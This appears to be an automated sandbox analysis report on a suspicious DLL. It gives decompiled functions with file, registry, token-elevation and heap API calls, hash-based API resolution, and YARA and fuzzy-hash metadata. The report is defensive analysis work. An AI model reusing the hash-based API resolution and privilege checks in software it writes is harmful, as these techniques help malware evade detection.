0x6e845c92
0x6e845c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E845C3E

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: af1376b7ec74d96bd430c799ea6f18cfbdba1102f66956323539b52f61f7d895
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 4F01DF3128431EFBFB9167E98D44FBF764DDF82658F104C35BA01651C5EE22A968C161

Uniqueness

Uniqueness Score: -1.00%

Function 6E845C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E845C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E843064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E83C26C(_t23);
				if(E6E83C280(_t23) != 0) {
					_t31[2] = E6E8435F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E843064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E843698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E843064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e845c01
0x6e845c05
0x6e845c09
0x6e845c12
0x6e845c18
0x6e845c19
0x6e845c0b
0x6e845c0d
0x6e845c0d
0x6e845c2f
0x6e845c43
0x6e845c31
0x6e845c3e
0x6e845c40
0x6e845c40
0x6e845c45
0x6e845c4a
0x6e845c58
0x6e845cc3
0x6e845cc6
0x6e845c5a
0x6e845c5f
0x6e845cac
0x6e845cb0
0x6e845cba
0x6e845cba
0x6e845cb0
0x6e845c61
0x6e845c6d
0x6e845c72
0x6e845c86
0x6e845c88
0x6e845c89
0x6e845c8a
0x6e845c8c
0x6e845c8e
0x6e845c8f
0x6e845c8f
0x6e845c92
0x6e845c92
0x6e845c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E845C3E

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 7a48f762e98a3dce69447dbbfa643d3bcfb3bc9ce805939b9e5a0ad03ae17c6b
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: 9401F23528031EFBEBA167E98D44F7F774DDF8265CF104C35BA05651C5DE22A968C160

Uniqueness

Uniqueness Score: -1.00%

Function 6E845E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E845E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E83C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E843064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e845e14
0x6e845e15
0x6e845e17
0x6e845e1d
0x6e845e1f
0x6e845e23
0x6e845e23
0x6e845e27
0x6e845e33
0x6e845e67
0x6e845e67
0x00000000
0x6e845e35
0x6e845e3a
0x6e845e3b
0x6e845e4f
0x6e845e60
0x6e845e51
0x6e845e5c
0x6e845e5c
0x6e845e65
0x6e845e6d
0x6e845e6f
0x6e845e72
0x6e845e77
0x6e845e77
0x6e845e7b
0x6e845e80
0x00000000
0x00000000
0x00000000
0x6e845e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E845D48,?,?), ref: 6E845E5C

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 32c4fa791007ee1284e18d53ea38e87af12aec4ca9069593fb4cbf6ffeff5c78
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 17F0F931A18F29FAD7515BBD9C40B9F73E8DFD1B50F244F29F540A6184E66098408261

Uniqueness

Uniqueness Score: -1.00%

Function 6E845E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E845E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E83C280(_t19) == 0) {
					_v12 = _a8;
					if(E6E843064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E8435F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e845e87
0x6e845e89
0x6e845e95
0x6e845e9f
0x6e845eb5
0x6e845ed4
0x6e845eb7
0x6e845ec8
0x6e845ecc
0x6e845eec
0x6e845ece
0x6e845ece
0x6e845ece
0x6e845ecc
0x6e845ed5
0x6e845eda
0x6e845ee3
0x6e845edc
0x6e845edc
0x6e845ede
0x6e845ede
0x6e845e97
0x6e845e97
0x6e845e97
0x6e845ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E845D79,00000000,?,00000000,?), ref: 6E845EC8

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: a5b31785dfb9ec320112db090a3730b3394b6407e1509a33915fbb72d13eb8de
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: A0F08131258B0FEFD791EBA9DC10AAE77D9EF49254F104C2AA899C6180EA32D904C621

Uniqueness

Uniqueness Score: -1.00%

Function 6E84564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E84564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E843064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E83E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e845656
0x6e845658
0x6e84565f
0x6e845661
0x6e845665
0x6e845667
0x6e84566a
0x6e84566d
0x6e84566d
0x6e845687
0x00000000
0x00000000
0x6e845698
0x6e84569c
0x00000000
0x00000000
0x6e8456aa
0x6e8456ad
0x6e8456b2
0x6e8456b7
0x6e8456b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E845698

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: 468fe67049bacfeddcc3e98af73116cd0ac3cb6ae3b9b967bdd194179eb71c18
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 13F0A4B510030EBBE7259F5A8C54DBBBBECDBC1B50F10891DA0D542540EA71AC50C9B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E841030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E841030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E84306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E84306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e84103e
0x6e841040
0x6e84104e
0x6e841052
0x6e84109b
0x00000000
0x6e84109b
0x6e841057
0x6e841058
0x6e84105a
0x6e84105f
0x00000000
0x6e841078
0x6e84107c
0x6e841089
0x6e84108d
0x00000000
0x00000000
0x00000000
0x6e841096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E841089

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 4eed855154a9eb1dcc55d5871c3c53f1077a7e3d5efc36e4244260ff104affb7
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: 53F04F70254647EBEA41D5BC9C68F7F32AD9BC1618F508C28B540CA194EB78C9598626

Uniqueness

Uniqueness Score: -1.00%

Function 6E843628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E843628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e84d228 == 0xa33c83e5) {
					_t7 = E6E843064(0x60a28c5c, 0x1c6ef387);
					 *0x6e84d22c = E6E843064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6e84d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e84d228 = 0;
					}
				}
				_t3 = E6E843064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e84d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e843630
0x6e843638
0x6e84366b
0x6e84367c
0x6e843687
0x6e843692
0x6e843694
0x6e843694
0x6e843687
0x6e843644
0x6e84364b
0x00000000
0x6e84364d
0x6e84364d
0x6e84364e
0x6e843650
0x6e843652
0x6e843653
0x00000000
0x6e843653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E83DE09,?,?), ref: 6E843692

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 6079f87c2e5d47d03df6b119668383284e519d29602a60b224a35aa32ba5be90
Instruction ID: c271d3ca4cbc1f7447d48a8d87f0eaaa98a46c02db5f3690bb49898aa0624ddf
Opcode Fuzzy Hash: 6079f87c2e5d47d03df6b119668383284e519d29602a60b224a35aa32ba5be90
Instruction Fuzzy Hash: 12F0273425629EFFEB605AFAFC08D52E6A8FF55695F100D39F284E5280D7B08C80E635

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E831494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E831494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E83F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v76, E6E83F4CC( &_v76) + 0x10);
				E6E83F4BC( &_v80, E6E83F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v84, E6E83F4CC(_t325) + 0x10);
				E6E83F4BC( &_v88, E6E83F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v92, E6E83F4CC(_t329) + 0x10);
				E6E83F4BC( &_v96, E6E83F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v100, E6E83F4CC(_t333) + 0x10);
				E6E83F4BC( &_v104, E6E83F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v108, E6E83F4CC(_t337) + 0x10);
				E6E83F4BC( &_v112, E6E83F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v116, E6E83F4CC(_t341) + 0x10);
				E6E83F4BC( &_v120, E6E83F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v124, E6E83F4CC(_t345) + 0x10);
				E6E83F4BC( &_v128, E6E83F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v132, E6E83F4CC(_t349) + 0x10);
				E6E83F4BC( &_v136, E6E83F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v140, E6E83F4CC(_t353) + 0x10);
				E6E83F4BC( &_v144, E6E83F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v148, E6E83F4CC(_t357) + 0x10);
				E6E83F4BC( &_v152, E6E83F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v156, E6E83F4CC(_t361) + 0x10);
				E6E83F4BC( &_v160, E6E83F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v164, E6E83F4CC(_t365) + 0x10);
				E6E83F4BC( &_v168, E6E83F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v172, E6E83F4CC(_t369) + 0x10);
				E6E83F4BC( &_v176, E6E83F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v180, E6E83F4CC(_t373) + 0x10);
				E6E83F4BC( &_v184, E6E83F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v188, E6E83F4CC(_t377) + 0x10);
				E6E83F4BC( &_v192, E6E83F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v196, E6E83F4CC(_t381) + 0x10);
				E6E83F4BC( &_v200, E6E83F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v204, E6E83F4CC(_t385) + 0x10);
				E6E83F4BC( &_v208, E6E83F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E844200(0x60a28c5c, _t434);
				E6E83F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E83F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E83F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E83F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E83F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E83F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E83F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E83F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E83F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E83F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E83F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E83F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E83F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E83F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E83F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E83F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E83F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E831D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E83B27C( &_v248, _v256, _t481, _v252, _t318);
				E6E83F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v296, E6E83F4CC(_t410) + 0x10);
				E6E83F4BC( &_v300, E6E83F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v304, E6E83F4CC(_t414) + 0x10);
				E6E83F4BC( &_v308, E6E83F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v312, E6E83F4CC(_t418) + 0x10);
				E6E83F4BC( &_v316, E6E83F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E83F828( &_v320, E6E83F4CC(_t422) + 0x10);
				E6E83F4BC( &_v324, E6E83F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E83B9FC(_t154,  *_t480);
				E6E83F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
